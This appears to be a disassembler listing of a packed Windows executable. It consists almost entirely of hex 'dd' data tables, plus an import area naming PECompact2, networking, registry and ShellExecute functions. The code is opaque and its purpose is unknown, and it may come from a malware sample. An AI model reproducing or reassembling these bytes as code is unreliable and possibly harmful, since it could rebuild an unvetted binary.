dd 0FE1D9761h, 0AB09A9FEh, 9AA4597Eh, 0FDCB3579h, 58961767h
dd 0A41AFD4Eh, 3DD1EA3h, 0B654D2B4h, 0BF54116Eh, 9A563823h
dd 112EA417h, 0B551370Ch, 60E4B569h, 8DCD0606h, 0FD5249CCh
dd 0C77411B9h, 8CEE22C3h, 0F3420EE9h, 0B5FEBEB8h, 2325E89Dh
dd 17855743h, 0B5EB9BECh, 48218C14h, 312027C3h, 3D7721B4h
dd 0A2828C93h, 867435E9h, 2C7C25C8h, 0D9FC69B0h, 0E80425Fh
dd 514B5447h, 79BA3DD6h, 5514F276h, 0CA359E3Fh, 707E9AE1h
dd 468CFF21h, 17AB895Dh, 0AEBB15F2h, 7BBB355Dh, 0DF5819FAh
dd 0EDEE0C14h, 5727343Dh, 7E60C5Dh, 9D816817h, 7059E9Bh
dd 68B86018h, 492E7119h, 339F3275h, 0A0BAF28h, 4A56EF03h
dd 0FF4DDE14h, 0C25B7374h, 0D34F968Eh, 449F9AA0h, 2FA7F10Dh
dd 16BFB8F1h, 1A03BB69h, 9A305E48h, 71DE3E12h, 0DCD384E8h
dd 3686186Dh, 0CB278F39h, 5C4A9B9Bh, 72D6E7B1h, 468AFC61h
dd 0F629EFFh, 0C977FEC5h, 0A28D299Ah, 0AAAF336h, 0F1A0D72Ah
dd 36EA2C43h, 0AF4D9527h, 3997CC92h, 0A4B747E5h, 0BB5F1FC2h
dd 20422DB4h, 65521840h, 0D12CB0E1h, 0E9EA62C7h, 2D01D8A6h
dd 0EB30860Ah, 0FC9C0B53h, 9518BE30h, 7BE7E72Ch, 0DC96EB90h
dd 48C13BA5h, 9EF53393h, 0A1696329h, 0B371B036h, 8CEA83F4h
dd 0FD8E7FF0h, 94DD55B9h, 41BA7039h, 0B23B309Bh, 0FCDE54B4h
dd 6FD70AF7h, 0E4DAD4Eh, 0AD1EA586h, 2362D34h, 0FB6C2E42h
dd 0F8FCD8ACh, 0D7D2C0DBh
dd 0FD86F95Fh, 7A89E306h, 1C50EF69h, 0A77392FEh, 99F5726Bh
dd 0DB243D75h, 9297B53h, 9C600839h, 82D8DB38h, 0B0229884h
dd 18329DF3h, 8F1E2AE6h, 2EE9646h, 886ADC78h, 7E6E7255h
dd 0F7E48258h, 0B0FEC804h, 64072855h, 0ACD0C709h, 0C5C9697Dh
dd 7B32332h, 6F6CC2CDh, 23A7C464h, 0EAE7BE7Fh, 2B6A019Ch
dd 60692C68h, 0DD7E16F0h, 745839C1h, 96BD9FE8h, 8B4E176Bh
dd 702D5B83h, 75918E7Eh, 67684B50h, 0AB090F7Eh, 2AFCE3FEh
dd 0BF5561E7h, 8C050692h, 0A65190CCh, 4998F03Bh, 45A77CC6h
dd 0E73215BBh, 8D8D5630h, 0FFC677D5h, 3A5BA24Eh, 7BD11610h
dd 0F672DCE0h, 3FED9022h, 7CEFB6ECh, 0EDB67754h, 0D027703h
dd 3DB131BEh, 8CBE8638h, 3AD4E0E9h, 0F6F9DD06h, 0DD989FC3h
dd 7A0F9CC2h, 8B26334Fh, 0A6362EAEh, 1E1BB84Fh, 0A567A0A9h
dd 0C7224086h, 0C9CFF2EEh, 0B71E59CAh, 0CB7B7029h, 8642488Ah
dd 30743DBEh, 0A8B63085h, 0B059154Bh, 3EEBCBEh, 0DF6112C0h
dd 0A1C1FA8Fh, 0EF6685F5h, 23C3F5D0h, 255B118Bh, 0F739DE29h
dd 7776A105h, 9508EF19h, 318A8669h, 71BCB524h, 0AE8AC362h
dd 0F131C6DCh, 0D94D0868h, 0A9F46CEh, 49E6785Eh, 0DD5B9BECh
dd 2DB2EBCDh, 0DF2FAA7Ah, 7E421380h, 732A77Dh, 0C2F1B4EAh
dd 68C636AFh, 0BC7B0B4Ch, 70F1FDC9h, 9010424h, 7098FB09h
dd 0E83677D7h, 78786D23h, 67534F6Ch, 4E3D1C0Eh, 46428BC0h
dd 55AC31A6h, 0CF8A0718h, 0EBBADAD8h, 635BD90Eh, 5DD9B104h
dd 555E2CCBh, 3CD62F16h, 1C9016Ch, 0D97DDF3Fh, 0D051D7C4h
dd 5BB43A23h, 0CFC24515h, 17E73D6Bh, 5A15EABAh, 0B53E2D03h
dd 436803D7h, 0C2978BC8h, 0FCEF9953h, 94DDBC4Fh, 9236A918h
dd 0E066BFC1h, 7ACC7BAFh, 0E9300D6Ah, 0F8D65502h, 6EF13EEFh
dd 0C75F0FFEh, 67E1BF69h, 4C4C3B75h, 5AEA587h, 546049C2h
dd 20DA3400h, 539798B1h, 0C7878B13h, 0D40F350Eh, 50A95F53h
dd 85DCEE75h, 0B9B25602h, 112BCC5Fh, 0C854CE6Bh, 0D25DDDBCh
dd 0C92728D6h, 0D267F790h, 0D777B680h, 8EE0F082h, 93361761h
dd 48D86725h, 5836AB3Ch, 0D8B0D6ECh, 55BB47Ch, 87CA6A7Ah
dd 9DD3469Eh, 3A67223Ch, 3764C1BCh, 0CFDA2B24h, 9763E519h
dd 0B5FB8FFBh, 561B0858h, 150C6D71h, 89C117C5h, 0FB6C1EC3h
dd 0D13E92F4h, 0ABE70A00h, 790534D7h, 3E90B8B3h, 9227C8E4h
dd 0F9495E4Ah, 62C84E37h, 0FFD7F856h, 0B6D155BDh, 3BA6D582h
dd 2F1079E8h, 6A5408A8h, 0C5E4BA93h, 711D535Fh, 15216F40h
dd 43751ADFh, 0F7C26AF5h, 33C49676h, 59ABFEB6h, 1FCD3EDEh
dd 42736160h, 1C44BE3Bh, 1AE080EEh, 7CA28E2Bh, 0F665CA6Ch
dd 0EF4FF6AFh, 1520A13Ch, 44090345h, 6EB9A5ECh, 85A4D69Fh
dd 0D4254FF1h, 6829FE14h, 0A4947D5Fh, 9478D034h, 80529DCFh
dd 0C112F95Ah, 200608Ch, 0F530C6D1h, 0DB8BAADh, 485D392Dh
dd 93F3E6D6h, 947A0378h, 8856454Ch, 0E5DD9D3Ch, 618D5AFCh
dd 7A44BE17h, 1068B7C5h, 1D0B4AFCh, 42E30E55h, 0A8537Eh
dd 6454480Ch, 0FADDDBEAh, 34E57897h, 986FAA7Ch, 95C1415Bh
dd 25113066h, 0A66BCB9Fh, 0DB93D2DAh, 5508578Ch, 9FFA8602h
dd 0B5945209h, 2B3F2511h, 2DBE1434h, 3F70CEA5h, 0F0B6C1DDh
dd 6E94904Ch, 7F73D14Bh, 9B492C50h, 59B21731h, 0B02C6259h
dd 0F8742E1Eh, 47D8BB85h, 8D407FF0h, 0A6B28623h, 437E5048h
dd 0B3B8AE7Fh, 19DE1389h, 0C6C42EDBh, 0AC4818BAh, 0C521AFAFh
dd 562B20Dh, 0A6ED334Ah, 0B9C3FB22h, 0B3E337D9h, 0A0825356h
dd 9A2504E5h, 0EC7AD266h, 7E82A920h, 0AC0B13Ch, 6B69AE07h
dd 9B5127Eh, 0C34D05BEh, 0E0B3B6CCh, 0C292AD0h, 8BBF1554h
dd 25ACD3DBh, 35ADE71Fh, 0F1D7B8C4h, 775EFDE9h, 33B009D0h
dd 7527B939h, 0A94E6882h, 3DBFA3E1h, 83A36EF0h, 973D6310h
dd 0BB716EB4h, 0F8E6606Fh, 5F150F4Eh, 0B02B1B0Fh, 0AD43B6A3h
dd 6F461A3Eh, 1023D751h, 20DC22FAh, 5D711FD5h, 0FAF97D0Ch
dd 0DD63D82Bh, 71D1A093h, 0C53A212Dh, 0AB2376F3h, 27BEE762h
dd 0D4EC2AC8h, 9775378Dh, 2B22AA28h, 0B171BD2Fh, 1FEF04D4h
dd 4FCDE462h, 0D2028D09h, 513F1C0Bh, 4B4B50D9h, 0F460B9E4h
dd 7F6DC16Eh, 0FE6D9644h, 0B6D7B596h, 0BFF583B2h, 389FBF8h
dd 500E7681h, 0C547D517h, 94EFAEB3h, 0D9EFF5D4h, 0CF91C8B0h
dd 6E114F9h, 0FF1E4703h, 0B85FD4EBh, 7FE86A35h, 0E6788699h
dd 72686893h, 6728B5F1h, 0B4E75C2Dh, 7FFDC853h, 0A9B5118Fh
dd 0A76A6DFFh, 0F8D7979Fh, 0CFE9B92Ch, 0EEAFC995h, 5D5D9ADh
dd 2D86E9E5h, 1B53D6CAh, 0D0FBD372h, 55E8DEF3h, 0CAC1C201h
dd 2CC864E0h, 609FCB1Fh, 312CEA52h, 9283E13Bh, 655A5C84h
dd 0BDF4BEE3h, 191C4C36h, 0EACE61B2h, 0E95F2D0h, 68CF470h
dd 5A3ABEA8h, 0DA05B686h, 0E2C30AC4h, 294956C8h, 0B2C23EBCh
dd 44F2D3DDh, 1A35DE49h, 0BA035823h, 4DB7CB09h, 7CF287C3h
dd 22B9DB30h, 3193E41Ah, 83C35776h, 4879F931h, 0B4618F57h
dd 6E77B130h, 2587C0A0h, 78F7AEBh, 67FD023h, 6DA63D27h
dd 0CEB8AE95h, 4A443AAEh, 0F9D6AFDEh, 82A49ACBh, 4DD7C739h
dd 49BBB8CDh, 0BC64AED6h, 8A8EB02Fh, 143FDB09h, 7C344CB8h
dd 0D51A8713h, 1CB29D87h, 0CE910823h, 65B73EB0h, 317C1A05h
dd 812388DDh, 943D1479h, 0B241353Ch, 9EDC06C0h, 0A610D668h
dd 54836F95h, 75C7DC5Fh, 331BFAh, 0EF4F6E9Fh, 0A9BE809Dh
dd 0D828D6C7h, 0B93DF661h, 99CBE86Eh, 80964C61h, 0E1C625E7h
dd 0D42A493Bh, 0A15C0529h, 23B62658h, 0E92FF47Bh, 0D569461Bh
dd 3D0D94Ah, 843D76ACh, 3F8B32BEh, 939E17Fh, 387FC3DFh
dd 0C1A5E391h, 896DAD55h, 2976C0CAh, 0EB673DC7h, 606A33CDh
dd 0E2310458h, 2761BE47h, 8137F585h, 0A7DBF5CCh, 0A019B162h
dd 0EFC8A83Bh, 0E44011F3h, 6690F2A4h, 0B3D6FB47h, 99636318h
dd 5304136h, 4DB0144Ah, 8EDE1894h, 0C1BBA6CEh, 2DE03AD8h
dd 7C805245h, 0D1696CE6h, 8F80DBEBh, 8022F977h, 349D493h
dd 8126AFE4h, 0C9E3742Dh, 5D462791h, 0A75140E6h, 0DF62F9D6h
dd 69089AD6h, 2BFD1783h, 0F0A0B551h, 0CC540067h, 51760A5Eh
dd 9217B2F7h, 0B083F425h, 0E123095Eh, 7785ABB7h, 0E818B7D0h
dd 0A303DF82h, 6BF56541h, 0ED0F15FEh, 577399B8h, 0A9A76656h
dd 83C28BB1h, 0B83849Ch, 0AB019992h, 4683576Ch, 0E2671ADDh
dd 4C659B3Fh, 717D6D6Dh, 6B9BFE8Eh, 7A2D70D2h, 0E97A0617h
dd 6B0081Fh, 0C3C0DEE8h, 32134590h, 74A3682Ch, 385757C4h
dd 49724915h, 0EE27375Fh, 74174B58h, 57D3F591h, 0BA84D75h
dd 0CFF08847h, 87A6AE48h, 9E1FEE40h, 680AFE87h, 4FDD0ABDh
dd 92FC187Ch, 676B8C57h, 0F5C680C1h, 0A7F76CEAh, 0C0BE20EAh
dd 320CA010h, 0D363400h, 0FDAB4B9Ah, 74924999h, 47C25D5Ch
dd 0E762A300h, 4E9B836Eh, 2D0ABBA0h, 2C4E4B90h, 0F6C8BE7Bh
dd 7F049DF4h, 3D009AB4h, 86F30E2Dh, 4A51EBBFh, 4F1D1527h
dd 9B8A04B6h, 0ECFC5A06h, 0F3E8CCF3h, 0B73B196Dh, 0AE77E6FBh
dd 414D8A30h, 0BB803422h, 0C45928ACh, 18484D3Bh, 0C1802234h
dd 0E9D7000Ah, 0F65D3C7h, 0E45F2FD4h, 0E4C438F9h, 0FB0310Ch
dd 8DAA9F9Ch, 0DCB4C790h, 0AD18B3EEh, 3D038F8h, 0A8C5A1h
dd 0C87866Dh, 9A2AC441h, 82189B7Eh, 0B6900D35h, 0BEEF2D1Ch
dd 895B548Ah, 0C54376DFh, 4A13CD84h, 0E482FA5Fh, 2BC0FB53h
dd 85E1BEE9h, 0ABD97121h
dd 36DED4E0h, 0A22A6DA7h, 0FBCDEDB0h, 0CE1713CDh, 0E837FE02h
dd 161E17Bh, 0E9FAF7E1h, 905E1A29h, 0BF530077h, 6CC7048Ch
dd 0D0444F20h, 5C397615h, 3E42D6C5h, 0D83509ADh, 0FCABB7B6h
dd 0EA61FEE4h, 0B5654E26h, 6F1C7273h, 1814FC1Ah, 0C0AA5C42h
dd 3618CE2Ah, 0B5DD381h, 3AA6770Eh, 57B3484Ch, 6CC80648h
dd 504D8BE7h, 575ABF13h, 858A221Eh, 33555932h, 0B354EF7Ch
dd 9A270FA5h, 368C502Eh, 0C03DB8ECh, 2F7A8809h, 60EF3059h
dd 0DA96BFB4h, 5EAE891h, 0CCCD6A14h, 0DB048FA9h, 0F5CE6E1Ah
dd 39642B42h, 0DF7D6598h, 0E5D1AD64h, 744FE033h, 436B7BDCh
dd 0B45591D2h, 0F59F822Dh, 2C0B6F32h, 41DD2B6Fh, 12241D09h
dd 0AF1CA60Fh, 3E400479h, 0A77A4725h, 4D22FE7Ch, 0FDC00D44h
dd 65AF08D3h, 85975403h, 89F7F58Fh, 3C767674h, 0E3BF9BA7h
dd 2F34715Ch, 3ABD8C6Eh, 2F184C35h, 8EA6397Eh, 5ED73AD6h
dd 8E4DD92Eh, 84EE377Eh, 0E36D2C3Bh, 0BF70C722h, 8F3D90C4h
dd 0A24B6047h, 41788D19h, 0A2979EF2h, 0F7DC588Fh, 79E8AA3Fh
dd 5680FBB1h, 0DED305Ch, 7E308D7Dh, 0C54B3685h, 47B5A07Dh
dd 387BB236h, 42537434h, 0EF396522h, 8F64E82Fh, 0A1900DB4h
dd 0FC538C6h, 87C780ABh, 0F994F833h, 7C5404ABh, 596FD37Bh
dd 0EB755D4Ch, 0AABACC76h, 0E7BE240Eh, 913E562h, 703DEF08h
dd 867460EAh, 2DD44969h, 580A5E6Ah, 0C5F9151Bh, 0AF2245E2h
dd 4218274Bh, 0C9B425ACh, 149EB324h, 6882327Eh, 0A72454C9h
dd 0F061B048h, 2F360C44h, 0A7A0628Dh, 56974BA8h, 148034A8h
dd 6DF568E6h, 0BEDB44D4h, 3B7402ECh, 97E4B4AAh, 52180A0Eh
dd 0DADB801h, 0D703CAD9h, 12CC91A7h, 8BB69FDAh, 64FB1781h
dd 0B09A4D3Ah, 2CC2B62Ch, 57F4902Fh, 0E7573792h, 0F30B18DAh
dd 0CDD2A62Bh, 0F43792D4h, 85F6AC72h, 0FFF73EA3h, 8697A7D6h
dd 482D877Eh, 734F3DF1h, 0F876990Dh, 79FB1C1Ch, 8C6386E9h
dd 0C678516Ah, 39EE5300h, 0A6F008E6h, 4D95C32Ah, 55BB8C36h
dd 0B2DE9A0Dh, 939E9741h, 0F0126715h, 2FF6BCC7h, 0A777D25Dh
dd 0EF4749A3h, 4B279B90h, 0BA050902h, 0B14924EFh, 0F11EE5A7h
dd 4B5AF38Ah, 0EC3553F5h, 0E67F011Fh, 0DDB4D4B0h, 5AACD54Dh
dd 1613E7C4h, 3D7D689h, 263B57BFh, 0F49C700Eh, 0FB5885D5h
dd 9E962A6Eh, 2DD3712Dh, 0ED3F1647h, 1403B8ADh, 804342DEh
dd 0DA518909h, 4A806DC1h, 7105FB52h, 4279511Bh, 0D8DD35DDh
dd 31425D3Ah, 86744BBAh, 4B0A8861h, 9485CDB3h, 9597F243h
dd 0A175767h, 72B834E3h, 719B916Bh, 4845A62Dh, 77BAE27Ah
dd 8A183CDh, 9896F465h, 0E8BC1F50h, 60A21946h, 1F3D8703h
dd 81751229h, 6856A6E7h, 2889C0DAh, 6DCBE6A6h, 3B29D38Ah
dd 1A732F3h, 47A86D3Bh, 0DB072AE6h, 0FB841C6Ch, 0EA50C74Ch
dd 5416D340h, 94ADEF5Ah, 0FFD39BB8h, 3A7D7AFh, 0AA39DE31h
dd 6C68E995h, 3608DFA1h, 0A2D5381h, 25AE4662h, 85958B2h
dd 9E727144h, 26781ED2h, 0AC453DF1h, 0DF1BDD2Ch, 4AFE6193h
dd 0E27F622Ch, 974963A1h, 0FB37644h, 7AD0CD40h, 29779A84h
dd 3AC815A8h, 7D34E6B5h, 4777826h, 0FF4DEFC7h, 0B99E83A7h
dd 3390BCF9h, 998BA051h, 6E18AD4Ah, 143ED3D5h, 0C219A852h
dd 0B3DD9E1h, 2F433690h, 0AC91D782h, 3D2F80F0h, 4293EF76h
dd 80111BA2h, 0C3F8EF9Ch, 0F7581D6Dh, 9FA7BE22h, 0B6787042h
dd 0D6B1B89Dh, 0FEF5C352h, 0B394500Bh, 8DF162CEh, 2DF3BFA1h
dd 28A70FB4h, 0F34460C1h, 0E6BCA330h, 0E758834Fh, 0C3FED2CDh
dd 8C0998BCh, 0A6406E71h, 0D403ABDDh, 2B967B4Ah, 386B8919h
dd 38339F7Fh, 0DB02171Ah, 0FFAF9CB4h, 25B03890h, 0F9DD8F7Dh
dd 0C9A6D70h, 2CA3Bh, 2E0D279h, 640E70E1h, 4DA162B9h, 0CDABA416h
dd 0B1B2978Dh, 55DEBA12h, 73AB3157h, 0D3970DE4h, 1031848Fh
dd 0C60C3AC5h, 0B01B33B8h, 9887C99h, 0BDC12F40h, 1DAD35C7h
dd 1942A3BBh, 89D646C6h, 50DE5A00h, 6E4DDAAFh, 9CFEC9CBh
dd 0CD2B4DBEh, 9AAE781Ah, 543E1E22h, 0E621D168h, 633399BEh
dd 78CD093Eh, 4A2F1D18h, 0C04E98FBh, 0D53C63FBh, 96292FECh
dd 0F992EE16h, 0B7FAE810h, 570D64F5h, 0BBE28B2Eh, 0A3223EB8h
dd 7AD9EC02h, 9B3E27EFh, 5FDB26F0h, 0B6E20F8h, 2C5F1551h
dd 0CCE04CD9h, 5FA8EF04h, 93D37BFh, 912AA3D6h, 0C0E350CCh
dd 0F4767A3Dh, 0DDF97C94h, 8A4319F3h, 35D44414h, 0F910CA89h
dd 0EEC8AE80h, 85369C7h, 0DAB9F804h, 93E479E6h, 9BD404DDh
dd 932482BCh, 0D2BE84F4h, 0A059B8D0h, 4DFFB724h, 0C60C7E12h
dd 75A4CF8h, 475FE6C5h, 0A2BC3209h, 37E0AECBh, 77C88DDCh
dd 0D942D71Ch, 0A6A74480h, 54F59981h, 0A467B99Dh, 516FB408h
dd 5054B675h, 78F4D78Ah, 0B8B941C9h, 0DCDB143Dh, 0E6F34BF6h
dd 0FB1892B1h, 0C5363393h, 37921DE1h, 7AD3BA13h, 9A0172AEh
dd 0F80770F4h, 731EA37h, 184C97C2h, 59C0E70Fh, 0F3B32C97h
dd 15376F46h, 0F91B384Fh, 45C0A055h, 87923859h, 1E840DAh
dd 71BD753Dh, 4CE6C2BAh, 21C33AD3h, 61BE69F3h, 56ABD28Eh
dd 0CE8E0BF6h, 7898B9EFh, 9FEA383Ah, 75316CF6h, 0B076B453h
dd 0A05F3AC0h, 231E3B54h, 0DCFD0938h, 1FE9DC9Fh, 3182399Dh
dd 86F0F29Ah, 0D988E510h, 6AAF93B2h, 928D1D6Bh, 0F67290C7h
dd 8771CA03h, 0F3FA1A34h, 507B69FBh, 6358E4FFh, 0B0E06F12h
dd 48F31EA9h, 5F0D496Ch, 6539993Bh, 0AC6E1C26h, 0B8495C09h
dd 0FF3989E1h, 0D7D394D9h, 64BF37ECh, 9D2782FAh, 107D2DE0h
dd 0EA0A7EEDh, 5EE6970h, 8D18BF78h, 0B3E16C4Ch, 0C426FCA6h
dd 0A21D7FACh, 580AD29Fh, 43643807h, 0F0EF819Dh, 0C427BFD2h
dd 4750227Eh, 0B01747F8h, 95561C48h, 5AF2EECCh, 846E6A89h
dd 250D6866h, 0E3031598h, 0BCE624AAh, 0E87ED502h, 42775166h
dd 62B0C819h, 0DD6D7745h, 10151B5h, 72D6F017h, 5D4DC8D7h
dd 8262F44Ah, 8C9E5972h, 0E67AF112h, 0F26B5476h, 97C36EEFh
dd 844423DCh, 0D548938Fh, 99687585h, 0CBB5809Dh, 0A3878464h
dd 0C63E6642h, 105D6305h, 71146AB5h, 2B1F4F70h, 8753A027h
dd 918D6D2h, 0F05F6FE1h, 4830834Dh, 98E31CD3h, 532385A0h
dd 0DE3E94F8h, 51CCEEB6h, 43292530h, 5DE84999h, 0F5585E3Fh
dd 0ED8D1548h, 159B6CB4h, 972CB51Fh, 0BEE30029h, 0F0C3DEF1h
dd 40E95AECh, 1CC7CA6Bh, 20D57EA9h, 2B5E5497h, 61BD5F2Bh
dd 78612C81h, 545594AEh, 1D802D2h, 0A7C1169Fh, 35F466A9h
dd 0CDC571A6h, 0B6423D77h, 5F74DE82h, 0B583B699h, 0E356FEC4h
dd 0D67C3F74h, 0F442E5B9h, 0BD21BC8h, 0F015BBB8h, 7F99A689h
dd 0BBC1840Ch, 27E58729h, 0DF745748h, 116638BFh, 1B747E12h
dd 1510BC88h, 32DAA341h, 0DD3A6AD8h, 7BCAABD9h, 0B09640A0h
dd 2EC2E52h, 0FE45BF3Fh, 0C92CCC2Ah, 90294DD3h, 0BCF71204h
dd 938F159Bh, 5A17524Ch, 5372975Bh, 6CA53320h, 0D85D7EB4h
dd 0F88B82EBh, 38C3E250h, 0B2E22D7Fh, 35E58750h, 47ABAD8Bh
dd 65E1B08Dh, 84F9D47h, 0E27273C7h, 30F9AE9Fh, 0E042574Fh
dd 2553CF90h, 143A7CC0h, 0CFA0001h, 0FF06A05Ch, 0C5396159h
dd 28A3FD1Bh, 0DE39903Ch, 0D81BC117h, 6FB04873h, 41F7BC3Dh
dd 886557CCh, 2BFFA8FEh, 1F95B0FCh, 0F5E88AEEh, 2D800828h
dd 0D187490Ch, 83D5338Ah, 0E93DEDCFh, 0EDA60CFFh, 94CD1820h
dd 0B7E014E3h, 7EE0671Ch, 89278F45h, 87F59803h, 5E24A41Bh
dd 8FE23055h
dd 0CAC698E9h, 7E0A9E53h, 0ABF56316h, 0CCC67280h, 7A200676h
dd 0DE9CF7A4h, 64084769h, 3408BC11h, 6B25228Fh, 0C2EF60D4h
dd 2101098Ch, 2A580885h, 0F046180Ch, 98A79127h, 51337315h
dd 0A4769D34h, 61ACB013h, 0FFEDDDFEh, 2C3FEE45h, 0C2136C2Bh
dd 38AF3BA7h, 1824FF5Eh, 0FCDD21EBh, 6385CF07h, 0B0D96A38h
dd 87442E21h, 0A4B6706Ch, 701C4D36h, 7821B90h, 56D990Ah
dd 698477E8h, 0BD26A4C3h, 54A6FB84h, 0F0227B18h, 8CD67884h
dd 1342D634h, 471EAE2Fh, 41B2EDF5h, 4CDF3645h, 0D9DAA112h
dd 0DFC4E65Eh, 2466935Ah, 7070D888h, 28D76463h, 5411A320h
dd 0A4E8E52Eh, 84262322h, 0C7F63F8Eh, 3A3DFDEAh, 535B8CE5h
dd 42FFE9D5h, 60373E26h, 91609163h, 0A50364E1h, 0D767ECF5h
dd 2D89681Dh, 0C1AB2BEDh, 5BD9E715h, 7E69E61h, 0BC312596h
dd 0E20A5987h, 2335EED6h, 36916DA3h, 0E4089A96h, 0F2F4334Bh
dd 0FF13CD4Fh, 25F4B308h, 1BE7F2E3h, 5EBFA786h, 1670771Fh
dd 0F8D9484h, 96ABA82Ch, 867DD70Bh, 745E1236h, 5207F56Dh
dd 93DBBF18h, 0D89547B8h, 0A083h, 38h dup(0)
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 7Dh, 0D0h, 45h
align 8
retn 0BFh
; ---------------------------------------------------------------------------
align 4
dd 3 dup(1), 0D042h, 0D03Eh, 0D03Ch, 0D0460000h, 6D820000h
dd 53570000h, 61745350h, 70757472h, 19CF00h, 3 dup(0)
dd 0D18Ch, 0D19Ch, 0D1B0h, 0D1C0h, 0
dd 8000000Ch, 0
dd 800015E8h, 0
dd 0D1F4h, 0
dd 0D210h, 0
dd 0D230h, 0
dd 0D254h, 0
dd 0D274h, 0
dd 0D294h, 0
dd 0D060h, 0
dd 0FFFFFFFFh, 0D17Ch, 0D060h, 0D074h, 0
dd 0FFFFFFFFh, 0D1D0h, 0D074h, 0D07Ch, 0
dd 0FFFFFFFFh, 0D1DCh, 0D07Ch, 0D084h, 0
dd 0FFFFFFFFh, 0D1E8h, 0D084h, 0D08Ch, 0
dd 0FFFFFFFFh, 0D204h, 0D08Ch, 0D094h, 0
dd 0FFFFFFFFh, 0D224h, 0D094h, 0D09Ch, 0
dd 0FFFFFFFFh, 0D244h, 0D09Ch, 0D0A4h, 0
dd 0FFFFFFFFh, 0D268h, 0D0A4h, 0D0ACh, 0
dd 0FFFFFFFFh, 0D288h, 0D0ACh, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 65470000h, 6F725074h
dd 64644163h, 73736572h, 0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 69560000h, 61757472h
dd 6572466Ch, 65h, 5F325357h, 642E3233h, 6C6Ch, 3443464Dh
dd 4C442E32h, 4Ch, 4356534Dh, 642E5452h, 6C6Ch, 615F0000h
dd 73756A64h, 64665F74h, 7669h, 52455355h, 642E3233h, 6C6Ch
dd 72540000h, 6C736E61h, 4D657461h, 61737365h, 6567h, 33494447h
dd 6C642E32h, 6Ch, 65470000h, 6F745374h, 624F6B63h, 7463656Ah
dd 0
dd 41564441h, 32334950h, 6C6C642Eh, 0
dd 65520000h, 65704F67h, 79654B6Eh, 417845h, 0
dd 4C454853h, 2E32334Ch, 6C6C64h, 68530000h, 456C6C65h
dd 75636578h, 416574h, 0
dd 33656C6Fh, 6C642E32h, 6Ch, 6F430000h, 61657243h, 75476574h
dd 6469h, 0DF18B8h, 0FF645010h, 35h, 25896400h, 0
dd 889C033h, 6F434550h, 6361706Dh, 3274h, 48000C08h, 575601E1h
dd 5C8B5553h, 0DB851C24h, 21AB840Fh, 0E60EBDE8h, 6B0B0D60h
dd 6C6E7265h, 642E3233h, 0B8064414h, 0C08513FFh, 0F08B8F38h
dd 86330CE8h, 6900ECE3h, 61757472h, 1865466Ch, 3E0453FFh
dd 0FFC4D0A3h, 1B72E88Bh, 8733A341h, 636F6E15h, 248B581Ch
dd 0C18F7C14h, 6A18A1F9h, 0FF481068h, 81F86036h, 33D00839h
dd 50D88B3Fh, 57047654h, 468D0808h, 0C9D5420Fh, 50CB6F9h
dd 0FF06180Dh, 53500E11h, 6002E6E8h, 5A28C483h, 8E67458h
dd 33033A99h, 40825048h, 1D0D553h, 0EB582805h, 5F5B5D11h
dd 8B94C25Eh, 0A042454h, 750A833Bh, 0C7754A75h, 89011042h
dd 8AC3FF0Ch, 0C1FFB074h, 448B8941h, 0F2510824h, 0C4C742Ah
dd 66838656h, 3E83D080h, 576008B0h, 0C1030689h, 6AFF084Eh
dd 5F044605h, 1EB06074h, 2BBE856h, 0C4E8B59h, 0E1C1C0F2h
dd 48390B08h, 2E4F6F86h, 0C3B8E875h, 0ECE7EC1Ch, 53453DB7h
dd 0CF657A7Ch, 89C28FCFh, 3730575Eh, 747EAFA3h, 0D12E8931h
dd 0DF3BEF24h, 1EC6EC72h, 832B063Ah, 0FF81014Dh, 81EC73F3h
dd 56120FA6h, 69E8E7C1h, 59E34EA5h, 40DED90Bh, 0D24DD87Ch
dd 5F728990h, 0D3721505h, 0C35D5B82h, 0B70F0494h, 0E1807C11h
dd 460C9723h, 0C1F8A808h, 0AF0F0BEFh, 0D03EBFAh, 0D73B567Fh
dd 0DF554073h, 80060166h, 0D0461C24h, 0FA2BACBFh, 305FFC1h
dd 398966F8h, 3EEA3481h, 19678942h, 1C6605B6h, 0B9EBDAACh
dd 2B42EB72h, 22DD59C7h, 1C16D79Bh, 0AD28F56h, 1BF43DD0h
dd 5EAC1E0h, 0CC86C22Bh, 0FEFD0FCAh, 8313FD40h, 7FE04C7Dh
dd 281F747Dh, 0C0E15028h, 1075FF10h, 3C9348Dh, 3AE850C6h
dd 92228C7Eh, 294F12CEh, 42C8E28Bh, 340CFAFBh, 0DBC0E2D3h
dd 0DB571453h, 0D898092Eh, 105839FFh, 8356277Eh, 0FF286508h
dd 127618E7h, 12040238h, 0CFE84CFEh, 0E0D33014h, 723B471Ch
dd 1BC7AE60h, 8B5F5EDBh, 77A15BC3h, 56DFCCA3h, 6C660C57h
dd 8496D32Fh, 0BA253C3h, 886CD63Dh, 7C29A8C2h, 0C09096E2h
dd 14BF4357h, 0D4761EB9h, 0CAFA9420h, 8765D00Ch, 0C144C3B2h
dd 14907EEh, 92C3A0E0h, 48322F6h, 0DB977841h, 48051081h
dd 0A6F03B28h, 0D17CAA1Dh, 2DBE1BEBh, 6F3422DEh, 3E765DC2h
dd 68650494h, 0E53BD88Eh, 9BC38AC7h, 8C9A7590h, 10B2572Bh
dd 46F65521h, 0F4F65445h, 0C921875h, 0B8D31DDDh, 6A068D04h
dd 99DE7803h, 9C8A4121h, 2E66C0Ch, 10452C1Ch, 1E285C85h
dd 983AA184h, 0B32B0233h, 14EB08C0h, 0ACAC496Ah, 4C68109h
dd 169DB6D7h, 28F96C10h, 9D309F39h, 30E13220h, 1470F867h
dd 0E7C2481Ch, 60C8D54h, 2077B857h, 62031A88h, 0FA84E82Dh
dd 770C8102h, 5589CEE7h, 0F4F006FCh, 60DC12ECh, 36057440h
dd 0DB323C07h, 39564A4Fh, 3006929h, 0E87D8988h, 873E42Eh
dd 0E958026Ah, 37B4D3FFh, 0BD03A9FFh, 0D1C81276h, 90040490h
dd 0FEE07475h, 0C913ABF3h, 830E0766h, 8D200CA0h, 1C0CD045h
dd 0F8FCD6A1h, 0B120832Ch, 91148481h, 8657287Dh, 0E82677BAh
dd 8384C023h, 0E07D89CEh, 850F18EEh, 51F41212h, 8DF813B6h
dd 0BF51D04Dh, 3DF462Bh, 0C803042Fh, 0FD317A4Eh, 8459CCFBh
dd 0F8894233h, 0E2331423h, 0C9024051h, 4D2A08B1h, 0D3C39E10h
